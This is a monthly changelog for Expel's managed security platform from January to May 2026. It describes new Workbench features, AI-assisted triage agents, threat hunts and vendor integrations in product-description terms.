Check here to learn about Expel's latest features, enhancements, fixes, and other improvements.

• May 2026
• April 2026
• March 2026
• February 2026
• January 2026

May 2026

New Features

• New Threat View
  The new Threat View in Expel Workbench is an enhanced alert triage view, making it easier for users to combine isolated events across different tools—endpoint, cloud, and network—into the full picture of an attack. New features include:
  • Group alerts from different sources by common indicators to quickly build the full attack picture.
  • Share views with other users, as well as save views to their account to reference different triage configurations or historical alerts.
  • View and triage phishing submissions in a grid layout.
  • Additional columns, sort options, and filter options available.

   

• Blocked malware triage agent
  New investigative action uses Ruxie AI's new blocked malware triage agent to automate the manual triage workflow for blocked malware alerts. It enriches the file (VirusTotal, VMRay sandbox, prior Workbench history, process and host data from Microsoft Defender), applies a deterministic 7-rule decision engine, and presents an Approve or Escalate recommendation to the analyst to keep a human-in-the-loop.

New Hunts

• Suspicious Msiexec.exe Activity
  This hunt analyzes time-based aggregations of commands and network activity across hosts, along with file signatures and file path activity, to detect potential abuse of msiexec.exe. It helps identify attackers leveraging this binary to gain unauthorized access, escalate privileges, or establish persistence — including through proxy execution, process injection, DLL payload loading, Rundll32.exe abuse, scheduled task creation, process tampering, and command or script interpreter invocation.
• Office365 Self-service App Anomalies
  This hunt groups Entra ID sign-in events by source Autonomous System Number (ASN) — a reliable proxy for the originating network organization — and profiles the volume and variety of self-service portal app authentications per ASN against your organizational baseline. Supporting signals such as token types, outcomes, user agents, and authentication methods are also surfaced to help analysts focus their investigation on the most relevant portions of the data.
• MS Sharepoint Exfiltration Activity
  This hunt surfaces anomalies by breaking down SharePoint activity per user, per session, and per hour — capturing the distinct zones, libraries, and files accessed, the operations performed, and the search terms used.

April 2026

New Features

• DUET + Verify Summaries (Beta): DUET notifications and automated Verify actions now include AI-generated summaries written specifically for each alert, replacing the previous templated text. Each notification includes an executive summary, extracted key fields, a danger assessment, and a confidence note that flags missing data that could affect your decision.
• Zendesk Syncing for Slack and Teams: Customers can now create, comment on, and attach files to Zendesk support tickets directly from their Slack or Teams channels by using @Ruxie, eliminating the need to log into Zendesk separately. Comments are synced bidirectionally, so replies in Slack/Teams post to the Zendesk ticket and responses added in Zendesk are reflected back in the channel thread. Note: We're exploring resolving tickets directly from Slack/Teams in a future release.
• SentinelOne Status Syncing: Alert statuses and analyst comments now sync from Expel Workbench back to SentinelOne Singularity Endpoint in real time as our SOC triages and resolves Expel Alerts. SentinelOne users get full visibility into Expel's actions and verdicts without leaving their EDR console.
• New Alert Grid: The new grid view in Expel Workbench makes it easier to combine isolated events across endpoint, cloud, and network tools into a full picture of an attack.
  • Group alerts from different sources by common indicators to build the full attack picture faster
  • Save views to your account and share them with other users to reference different triage configurations or historical alerts
  • Triage phishing submissions directly in grid view
  • Additional columns, sort options, and filters

New Hunts

• SaaS Hunts:
  • Suspicious MSFT Intune Device Management Scope Grants
• Endpoint & On-Prem:
  • Suspicious Rundll32.exe Activity

March 2026

New Features

• First Seen Vendor Alerts (FSVA) Decision & Detection Agent: We've launched the FSVA (First Seen Vendor Alert) Detection Agent to scale our detection surface. By utilizing an automated reasoning workflow, the agent evaluates novel vendor signals and generates syntactically correct detection candidates for human review.
• Not Malicious Verify Button: We've updated the Verify Action workflow in Workbench and Slack to include more specific disposition options. 
  • Key Changes: 
    • New button option:
      • Added "Not Malicious: Close": A new option to close alerts that are unauthorized policy violations but not security threats. Will auto-close the alert.
    • Existing button options:
      • Authorized: Confirms activity was expected and auto-closes the alert.
      • Not Authorized: Confirms suspicious activity and auto-promotes the alert to an Incident.
    • Updated API Requirements: The PATCH /investigative_actions/:id endpoint now requires an authorization_reason for all verify actions to ensure notification conditions are met.
      • The authorization_reason for the PATCH /investigative_actions/:id is not a required field on the backend, so it will not break customers' existing connections.
      • We recommend that customers update the authorization_reason field if they plan to use the NOT MALICIOUS: CLOSE verify action disposition because it changes the behavior of the SOC notifications and the auto close behavior for this verify action outcome.

New and Updated Integrations

• MDR for Email - Mimecast: Expel now integrates with Mimecast Advanced Email Security. Connecting Mimecast to Expel Workbench unlocks two key capabilities: 
  • Alert Ingestion & Triage:  Expel automatically ingests and triages Mimecast alerts and escalates only real threats
  • Active Remediation: Expel can automatically remove confirmed malicious emails from users' inboxes.
• Cisco ASA: Expel now integrates with Cisco ASA, including OOTB rules.
• Cloudflare Zero Trust: support for ingesting and monitoring security events from Cloudflare's Zero Trust network access and security platform into Workbench.

February 2026

New Features

• Lead Alert Summaries: Summarize the Content of an Alert: When an alert fires, Workbench now displays an AI-generated natural language summary of the alert. The summary includes the most important observables contained within the alert, any context Expel already knows about those observables, and insight into why those observables indicate maliciousness or benignness, helping users more quickly understand what is going on without needing to review individual fields and raw logs. 
• Auto Remove Email Remediation Matching Update: The Auto Remove Malicious Email autoremediation has been updated with new matching capabilities. Customers using MDR for Email and/or Phishing who have Gmail or Microsoft configured in Workbench for email removal can now take advantage of date-based filtering, more advanced full or partial matching of emails by subject and/or sender, and the ability to search for multiple senders at once. Note: Microsoft customers using this feature will need to make a permissions change in Microsoft.
• SOC communication just got a major upgrade: We’ve enabled near real-time, two-way messaging between Slack and Expel’s Workbench. You can now thread replies directly onto Slack Investigation Created and Incident Created notifications to reach our SOC Analysts instantly. Their responses will flow back into your Slack thread, creating a seamless conversation loop without you ever having to leave your workspace.

New and Updated Integrations

• JumpCloud (DUET Only): JumpCloud is an identity and device management platform that provides directory services, SSO, multi-factor authentication, and device management capabilities. Expel has mapped signal from JumpCloud to detections that are both triaged by our SOC or automatically enriched and sent to your team via a DUET.
• Arista NDR: Expel now integrates with Arista Network Detection and Response, including custom rules. This integration provides network monitoring and threat detection capabilities for customers using Arista's NDR platform.
• CrowdStrike NG SIEM: Expel now integrates with CrowdStrike NG SIEM, the modern, cloud-native security platform that helps deliver faster, more efficient threat detection, investigation, and response.

January 2026

New Features

• Webhooks for Phishing Notifications: Customers can now configure new Phishing notifications via webhooks in Workbench. These notifications were previously unavailable via webhook but are now available for all Phishing customers. (Phishing Submission Created, Phishing Expel Alert Created, Phishing Expel Alert Reopened)
• Darkmode: Dark mode is a visual way to reduce eye strain for Workbench users.  By default, Workbench is now set to mirror user system settings for light/dark mode.

New and Updated Integrations

• JumpCloud (DUET Only): JumpCloud is an identity and device management platform that provides directory services, SSO, multi-factor authentication, and device management capabilities.
• Arista NDR: Expel now integrates with Arista Network Detection and Response, including custom rules. This integration provides network monitoring and threat detection capabilities for customers using Arista's NDR platform.

Updates

• Wiz Status Sync: The Wiz Status Sync feature has been refactored to work with the current version of the Wiz GraphQL API.  This functionality enables synchronization of alert statuses between Wiz and Workbench, resuming normal operational behavior for bidirectional status updates.